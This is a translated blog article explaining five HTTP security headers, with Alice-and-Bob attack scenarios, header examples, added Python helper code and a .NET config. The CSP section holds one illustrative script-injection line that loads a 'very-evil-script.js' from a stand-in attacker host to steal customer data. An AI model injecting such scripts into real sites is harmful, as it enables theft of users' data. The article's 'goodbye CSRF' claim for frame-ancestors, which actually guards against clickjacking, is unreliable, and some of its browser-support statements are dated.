Top-5 HTTP Security Headers in 2020

stay secured

Nowadays, security is more important than ever. I've prepared a very short article about the top 5 security headers in 2020 that will help your site keep its users safe. Have a nice read!

Content-Security-Policy

This is one of the most important security headers. It was created to prevent the use of any resource from an untrusted source.

Let's go to the short example first:

Evil Bob found an XSS vulnerability on Alice's site. He decides to inject a script into the web page to steal some customer data. He puts this script tag into her page

<script src="https://my-evilt-site.org/very-evil-script.js"></script>

and waits for the results

Luckily, Alice knows about the CSP header and has already added it to the response: Content-Security-Policy: default-src 'self'. Now the browser knows that scripts (and images, fonts, and styles) that are not from the origin domain are forbidden, and Bob's attack fails.

With this header you can deny inline scripts and the use of eval (goodbye inline XSS), specify a checksum for scripts (goodbye substituted 3rd-party scripts), and allow specific domains for your images, fonts, and styles. It can restrict fetch requests, deny use of your site inside an iframe (goodbye CSRF), and much more. The CSP header is very flexible and can support almost all of your needs.

Can I use?

The CSP header is supported by almost all browsers including IE (but under a special name, X-Content-Security-Policy). Some of the directives may not be supported by every browser, but that will not break the header.

Code Example

  • Allow all remote resources from your domain (no external API calls allowed!):

    Content-Security-Policy: default-src 'self'

  • Allow all remote resources from your domain and external API calls (iframing is allowed):

    Content-Security-Policy: default-src 'self'; connect-src 'self' https://my-example-api.ua

  • Allow all remote resources from your domain and external API calls, but disallow iframing your site:

    Content-Security-Policy: default-src 'self'; connect-src 'self' https://my-example-api.ua; frame-ancestors 'none';

  • Disallow everything except what is whitelisted:

    Content-Security-Policy: default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self'; frame-ancestors 'none'

  • Disallow everything except what is whitelisted (with inline CSS):

    Content-Security-Policy: default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'none'

The examples are simplified just to give you a better understanding of the power of the CSP header. For additional info, check the MDN page; the CSP Cheat Sheet is also very useful.

Important Notice: if you need to deny the possibility of iframing your site in IE, you should use X-Frame-Options.
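As an added example (not code from the original article), here is a small Python linter that parses a CSP string into its directives and flags the weak spots discussed above: a missing default-src, 'unsafe-inline', 'unsafe-eval' or a bare wildcard in the effective script-src, 'unsafe-inline' in style-src (the trade-off of the last example), and a missing frame-ancestors. The fallback from a fetch directive to default-src follows the CSP specification; the policies it is run on are the article's own.

```python
# Added example (not from the original article): a tiny CSP linter.
# It parses a policy string into directives and flags the weak spots the
# article discusses. Per the CSP spec, a fetch directive such as script-src
# falls back to default-src when it is not set; frame-ancestors never does.
from typing import Dict, List

FETCH_DIRECTIVES = ("script-src", "style-src", "img-src", "font-src", "connect-src")

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Turn "dir src src; dir src" into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def effective_sources(policy: Dict[str, List[str]], directive: str) -> List[str]:
    """Sources that actually apply to a directive, honouring the default-src fallback."""
    if directive in policy:
        return policy[directive]
    if directive in FETCH_DIRECTIVES:
        return policy.get("default-src", [])
    return []

def lint_csp(header: str) -> List[str]:
    """Return short finding codes for a policy; an empty list means no complaint."""
    policy = parse_csp(header)
    findings: List[str] = []
    if "default-src" not in policy:
        findings.append("missing-default-src")       # undeclared types are unrestricted
    scripts = effective_sources(policy, "script-src")
    if "'unsafe-inline'" in scripts:
        findings.append("script-unsafe-inline")      # inline XSS still runs
    if "'unsafe-eval'" in scripts:
        findings.append("script-unsafe-eval")
    if "*" in scripts:
        findings.append("script-wildcard-host")      # any origin may serve scripts
    if "'unsafe-inline'" in effective_sources(policy, "style-src"):
        findings.append("style-unsafe-inline")       # the trade-off in the last example
    if "frame-ancestors" not in policy:
        findings.append("missing-frame-ancestors")   # page can still be framed
    return findings

# The article's first and last example policies, ready to run through the linter.
ARTICLE_MINIMAL = "default-src 'self'"
ARTICLE_STRICT = ("default-src 'none'; img-src 'self'; font-src 'self'; "
                  "connect-src 'self' https://my-example-api.ua; script-src 'self'; "
                  "style-src 'self' 'unsafe-inline'; frame-ancestors 'none'")
```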

X-Content-Type-Options

This is a bit of a tricky header, but it works very well with CSP, so it is worth mentioning.

Imagine that Evil Bob found XSS on Alice's site and tries to put some malicious script inside. But Alice has already set up a CSP policy, so his attempt to download JavaScript from untrusted resources fails. But Evil Bob is smart. He changes the type of the injected script to "text/plain". Now CSP will allow the script to load, because it is not JavaScript anymore and should not be executed. But sometimes browsers try to be too smart. They may inspect the content of the loaded "text" and decide to execute it as JavaScript. This is called sniffing, and the behavior varies depending on the browser.

This header tells the browser to strictly follow the provided MIME type and not try to guess.

Can I use?

Supported by all browsers except Safari.

Code Example

Only one option is possible:

X-Content-Type-Options: nosniff

Feature-Policy

This header is designed to turn off features that you don't expect to be used.

Alice has a nice and shiny site with a big audience. Evil Bob found XSS and decided to use Alice's site for spying on users through their web cameras. So he injects malicious code and waits for dozens of new videos.

But, fortunately, Alice has already set the Feature-Policy header to Feature-Policy: camera 'none'

Now browsers know that using the camera is not permitted for anyone, and Bob's attempt fails. Of course, you can turn off not only the camera but also autoplay (useful when you are showing ads from 3rd-party vendors), the microphone and much more. If you don't want to turn a feature off for everyone, you can allow it only for code from your own domain.

Can I use?

Partially supported by most browsers and not supported by IE.

Code Example

Disabling geolocation:

Feature-Policy: geolocation 'none'

Disabling other sensitive features:

Feature-Policy: camera 'none'; microphone 'none'; geolocation 'none'; autoplay 'none'; display-capture 'none'; payment 'none'

Check MDN for the full list of available features.

Strict-Transport-Security

This is a very simple header for those who use HTTPS. It tells the browser to use only HTTPS connections, even if the user tries to use HTTP.

Let's imagine that Alice is sitting in a public place using public WiFi. Evil Bob is sitting not very far from her, trying to sniff all non-encrypted traffic. Alice decides to visit an online shop and uses an old, familiar link like www://my-example-shop.com. Evil Bob sees her request (it's not encrypted) and starts recording Alice's activity, hoping to get credit card information. But after the first request the shop returns the STS header: Strict-Transport-Security: max-age=31536000, and the browser automatically redirects Alice to the HTTPS version of the page. From now on, Evil Bob sees only encrypted traffic and can't steal anything.

Can I use?

Supported by all browsers except Opera Mini. And yes, IE also supports this header.

Code Example

Strict-Transport-Security: max-age=31536000; includeSubDomains
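As an added example (not from the original article), the following Python models how a browser stores a Strict-Transport-Security policy and decides whether a plain http:// request must be upgraded; the host my-example-shop.com is the article's, every other value is constructed. It also covers a detail the story above glosses over: per RFC 6797 a browser ignores this header on a plain-HTTP response, so the policy is only learned from the first HTTPS response.

```python
# Added example (not from the original article): how a browser applies
# Strict-Transport-Security, following RFC 6797. The header is honoured only
# on an HTTPS response, max-age is a lifetime in seconds, includeSubDomains
# extends the rule to every subdomain, and max-age=0 forgets the host.
from typing import Dict, Optional, Tuple

HstsCache = Dict[str, Tuple[float, bool]]   # host -> (expiry, include_subdomains)

def parse_hsts(value: str) -> Optional[Tuple[int, bool]]:
    """Return (max_age, include_subdomains); None if max-age is absent or invalid."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name, arg = name.strip().lower(), arg.strip().strip('"')
        if name == "max-age" and arg.isdigit():
            max_age = int(arg)
        elif name == "includesubdomains":
            include_sub = True
    return None if max_age is None else (max_age, include_sub)

def record_hsts(cache: HstsCache, host: str, header: str, over_https: bool, now: float) -> bool:
    """Store the policy for host; returns False when the header must be ignored."""
    parsed = parse_hsts(header)
    if not over_https or parsed is None:   # plain-HTTP responses cannot set HSTS
        return False
    max_age, include_sub = parsed
    if max_age == 0:
        cache.pop(host.lower(), None)
    else:
        cache[host.lower()] = (now + max_age, include_sub)
    return True

def should_upgrade(cache: HstsCache, host: str, now: float) -> bool:
    """True when an http:// request to host must be rewritten to https://."""
    labels = host.lower().split(".")
    for i in range(len(labels)):
        entry = cache.get(".".join(labels[i:]))
        if entry is None or entry[0] <= now:
            continue                        # unknown or expired entry
        if i == 0 or entry[1]:              # exact host, or a parent with includeSubDomains
            return True
    return False
```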

Referrer-Policy

Controls how much of the referrer information (host, query params, etc.) is sent with the request.

Short example:

Alice has a forum about cats with lots of links to other resources. When a user clicks a link, they are navigated to another web page, and that page can gather some information about the source of the navigation. You value your users' privacy and want to keep this information secret. You set the Referrer-Policy header and deny the browser from sending referrer information to anyone except yourself.

Can I use?

Mostly supported by all browsers (IE partially), except Opera Mini.

Code Example

Showing referrer info only for the origin:

Referrer-Policy: same-origin
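As an added example (not from the original article), this Python function computes the Referer value a browser would send from a page under a given Referrer-Policy. It covers the article's same-origin value and, going a bit beyond the text, a few other policy names from the Referrer Policy specification so the differences are visible side by side; the cats.example URLs are constructed.

```python
# Added example (not from the original article): what Referer a browser
# sends for a navigation from `source` to `dest` under a Referrer-Policy.
# Semantics follow the W3C Referrer Policy spec; an empty string means the
# header is omitted. The sample URLs used in the tests are constructed.
from urllib.parse import urlsplit, urlunsplit

def origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc.rsplit('@', 1)[-1]}"   # drop any userinfo

def strip_for_referrer(url: str) -> str:
    """Browsers never send userinfo or the fragment in Referer."""
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port:
        host = f"{host}:{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, ""))

def referrer_for(policy: str, source: str, dest: str) -> str:
    """Return the Referer header value; '' means no Referer is sent."""
    same_origin = origin_of(source) == origin_of(dest)
    downgrade = source.startswith("https://") and dest.startswith("http://")
    full = strip_for_referrer(source)
    origin = origin_of(source) + "/"        # an origin is serialised with a trailing slash
    if policy == "no-referrer":
        return ""
    if policy == "same-origin":             # the article's choice: leak nothing cross-site
        return full if same_origin else ""
    if policy == "origin":
        return origin
    if policy == "no-referrer-when-downgrade":
        return "" if downgrade else full
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return ""
        return full if same_origin else origin
    raise ValueError(f"unsupported policy: {policy}")
```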

Summary

Since I use .NET, here is the resulting setup for web.config (note: inline JS, i.e. 'unsafe-inline' for scripts, is not allowed by this policy):

<customHeaders>
    <add name="Content-Security-Policy" value="default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'none'" />
    <add name="Feature-Policy" value="camera 'none'; microphone 'none'; geolocation 'none'; autoplay 'none'; display-capture 'none'; payment 'none'" />
    <add name="X-Content-Type-Options" value="nosniff"/>
    <add name="Referrer-Policy" value="same-origin"/>
    <add name="Strict-Transport-Security" value="max-age=31536000"/>
</customHeaders>

Bonus: web.config with all set headers can be found here

Stay safe and don't forget to remove the X-Powered-By header! :)

[Thanks to John Salvino for the photo]

Author's blog: http://drag13.io/

Translated from: https://habr.com/en/post/499342/
